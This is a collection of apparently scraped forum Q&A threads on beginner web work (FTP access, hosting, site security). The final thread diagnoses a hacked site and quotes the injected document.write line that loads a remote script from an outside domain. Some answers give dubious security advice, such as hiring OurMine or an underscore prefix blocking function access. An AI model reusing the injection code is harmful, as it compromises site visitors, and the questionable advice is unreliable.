So this is going to be a kinda complicated, frustrating question.
SO I recently started working for a company doing a lil marketing/social media. One of the things they wanted me to update was their website (refresh the look and layout and update the design) I've never built a website (i mean I have a Wix portfolio but..) and have had little HTML experience, but I've taken a bunch of c++, python and other coding classes and also really like figuring out new things. Their IT guy now works for another side of the company and is very weird about relinquishing the passwords for the various social media sites and whatnot. When I finally got the admin passwords for the website I realized that that only lets you change the words on the website or add new info. There is no layout/coding capabilities at all. He also gave me the FTP access and the username and password for that. He was very weird about me changing things (even though the CEO asked me to) and won't give a straight, comprehensible answer about the capabilities we have with this website! The original person who created the website is no longer here and they can't seem to find his contact info.
So my main question is, how do I use the FTP info? Do I simply just download an FTP client and login there???? Will it even be possible for me to access this websites infrastructure? I just kind of need a starting point on what I should be researching/trying to do.
Sorry this was so long and feel free to ask questions because I bet I was a little confusing.
PS. I don't even know what host it was built with like Wordpress or ya kno
Do you know where the website is hosted? Ask him for the hosting provider login. Once you have that, you will be able to see what sort of installation you have there, and to obtain the credentials you'll need to FTP in via Filezilla or a similar tool. If he doesn't give you the info, take it to your boss and have them apply pressure from above.
He might have added you as an author or a user that's not an admin. Make sure your an admin.
The FTP can be accessed from the hosing service, but you mentioned that he didn't give you the details. So download Filezilla to access FTP.
Hope this helps.
Related
I am new to web development so this question might be basic. I was asked to create a photography site in node.js for a friend. I want to create a way for only her to login to the site and fill out forms and update content. Should I put the login link on the main page like other web apps or create a secret route that she can go to and login?
sorry for the newbie question.
I have googled extensively on this subject and even took an online web-developer course. I cant seem to find the answer anywhere.
Google Firebase has some pretty good authentication stuff for applying access controls. It really depends what kind of security you need.
Consider this. Some other user gets a hold of the route that you've provided. Your client's site could be completely sabotaged.
My suggestions is to check out Google Firebase Authentication it will be worth while to know that suite if you are doing independent contracting work.
I have taught myself HTML/CSS and some JavaScript as a hobby, and have reached the point where I am comfortable building a clean simple website. The company I work for (we do nothing related to coding) has a website that is quite outdated so naturally I saw this as an opportunity for my first live site. I approached my Managers at work to take a look at my first mock up and they loved it and want me to revamp our current site.
The one concern they have with me being a rookie is the issue of web security. Essentially they want to make sure that the website I build leaves no vulnerability for someone to hack through our server, start editing our website, etc.
There are no interactive components to the current website. I plan to build this website with only HTML and CSS, and perhaps add some JavaScript later down the road once I progress in my learning a bit more. There are no account logins or areas to enter personal information anywhere on the site.
My question comes down to this -- what can I do to ensure that the website I build is not leaving our company vulnerable? I have done a lot of searching around Stack Overflow and other websites but I am not confident I am finding the correct information.
Details that might make a difference:
Our company website is hosted through godaddy.com
Our website is currently on Wordpress, but I will probably not use Wordpress for the new website
I greatly appreciate all of your help!
since there should be no direct interacting with the server ex PHP and AJAX only HTML CSS and js there should be no security issue, as js and HTML can't edit/delete/read server files, only server-side programming can. eventually you may want to invest in PHP almost no website is complete without PHP or AJAX. take me for example, I used to use just HTML, CSS, and js. then I wanted to do more.. log form answers to a file, show different pages based on the query string. these things are virtually impossible in a HTML, CSS, and js only environment. I would also recommend atleast getting free protection from cloud flare.. they give free shared hosting wildcard SSL, and free DDOS protection, granted for a business you might want to invest a little more than free but free would be a good starting point
also you could pay someone to test the vulnerability of your company, take for example OurMine. a legal hacking group.. you pay them to test your security and they do just that. (they claim they don't log anything that they get) otherwise there might be vulnerabilities you may not be aware of
When you are concerning about just AJAX call, I would help you out for following suggestion regarding "Function access rule from AJAX".
By adding "_" as a prefix for Function name, we can prevent function to be called from The Web publicly. This is the best practice when we need some specific function to be accessed via AJAX only.
Kindly, refer my answer given in other question.
[Website Security: How to learn?
So I do not quite know if THIS website is the actual place to ask this question so please forgive me if it does not cooperate with question asking standards.
I am currently making a website with HTML and I am using Brackets as my editor. Now once I purchase a domain and I post my website and it is finally on the open web ready for commercial use, what if I need to change some information or add some pages?
Will I have to just open up the code using Brackets, edit it, and somehow replace it in the place where I put it in the first place? Or is there some sort of program that I can use that can update this?
I am just asking for suggestions. Thank you.
This is a very broad question and will likely be removed, however I'll point you in the right direction.
The exact steps to update your website will depend on your web host and the server you have set up, but in general you want an FTP/SFTP client that will connect to your server and let you upload files (I recommend Filezilla). All you do is connect to the IP address of your website and log in, then upload the new versions of the files to your website. It may take a few minutes to propagate and you may have to refresh the page, however that's all there is to it. For further help, just Google a tutorial on Filezilla.
I am learning the html course from the available tutorials on the internet. And with that knowledge I have developed some html files and I believe there is more to go. These files consist of our old school friends and their present condition and what they're doing. I have created a bunch of html files. Like I have created a website for now named as www.mypage.com
Arjun
So in the href I'm just giving the path but those files are in my desktop pc itself. How do I put them on internet and share with my friends who are living somewhere out of this town. I want to reunite all of my school friends using these files. But where do I upload them and make it like a webiste to my friends? Is there any free way to do that? Or any possible way to reach it.
And I'm saying sorry if the question is not for the tag I mentioned. Please let me know and I remove the tag. I don't know what is the link to wikiposts to share my views. If you know then let me see the link. Thank you.
Find a web hosting service (Google knows lots)
Sign up
Follow their instructions
Arjun
And use relative uris
I use http://webhosting.uk.com ... for about £32 a year you get asp.net hosting and access to sql server.
then you simply ftp up to your website something like this (using windows explorer) ....
ftp://mysite.com <-- not a real link
... that would then open up the remote server as if it was a local folder so you could drag and drop your files straight over.
there's an online chat link on the top right of the homepage, the support staff will walk you through getting setup.
don't forget though ... the cost of the domain name that's the bit that turns your server ip address in to stuff like google.co.uk ... I highly recommend them.
I shall just expand on Quentin's answer, because it is clear that you are new.
What you need is a web hosting service. This is a service which hosts your html pages, meaning stores them in their own computers, and also displays them to the world as webpages. Web hosting services are usually paid, but there are some excellent free services if your content is not too big. A simple and free service that I would recommend is Google Sites. You could also try Google App Engine, where you have more freedom and control over your content, but for the same reason it is a little more advanced. But since you are learning html, I believe it is a wise idea to learn more about these services and related concepts.
When you upload your files, the html links need to be changed. They can no longer point to files in your hard drive. When you upload these files, there will be a directory structure in it. All you need to do is place hyperlinks with relative addresses.
And about what your website will be called, www.whatever.com, that is quite another business. For that, you need to register your own domain name, for which you must pay. If you don't want to, then your website will be labelled something under the hosting service domain name. This forum is not adequate to go into a more elaborate explanation of all this, but I think I have mentioned all the key terms, so do some research!
The home-page of our static html website http://www.iffort.com is transferring data from a mysterious website rawalrohi.com. You can check this by going to iffort.com and noticing the footer there. It says transferring data from rawalrohi.com.
From our side we did the following things to rectify the issue
a.) Analyze the source-code of all pages. We checked the code and found out that a script src=http://rawalrohi.com/images/ART.php was inserted in all pages. We removed this script from all the ‘html’ pages of the website
b.)Next we spoke to the hosting company, they said they can provide us a back up of the site. We have the backup but haven’t used it to restore the site.
c.)Lastly, we have changed the FTP password because we were told that somebody could have hacked our FTP password.
Despite doing this the home-page still says transferring data from rawalrohi.com. The view source doesn’t reveal the URL. This is slowing down our website.
Any help is greatly appreciated.
Your page references a file called "js/hyperlinked_Images.js"
Have a look at this file, right near the bottom:
...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
Now if you'll excuse me, I'm go to run a quick AV scan on my system ;)
make sure you don't use one FTP account for everything, control the FTP user control, it will help you to manage your website.
I've seen similar behaviour a while back. In that specific case, the ftp-password was compromised: it was read from the clients desktop PC by malware that collected stored ftp passwords.
We found this out only after the password was changed and compromised again within a few days.
So make sure you scan all machines that 'know' the ftp password with a decent AV-scanner.
I just recently saw this on a clients website, a different url but same type of code injection was in all of their files. To fix the problem, I download the site and I used Visual Studio to do a sitewide "find & replace" on the string. This solved the problem for me. I suggest you do something similar for all files, you might have missed one. My clients site had html/htm/aspx files that were all infected, ISP made the same statement that the FTP password was probably compromised...
Make sure you on your antivirus. Whenever the your website loading funny external script like adware, spyware, your antivirus will alert you.
I didn't scan your site, but if you're using any standard software on your website, like: WordPress, Drupal, Joomla, etc. then you need to keep that updated at all times. Subscribe to their security alerts and whenever you see an update, drop everything you're doing and update.
Hackers are constantly scanning the internet for vulnerable websites. It only takes them a fraction of a second on a vulnerable site to infect it.
Also, keep all the plugins, add-ons, components, modules, contributions, etc. updated as well.
Otherwise, you'll be cleaning this over and over again.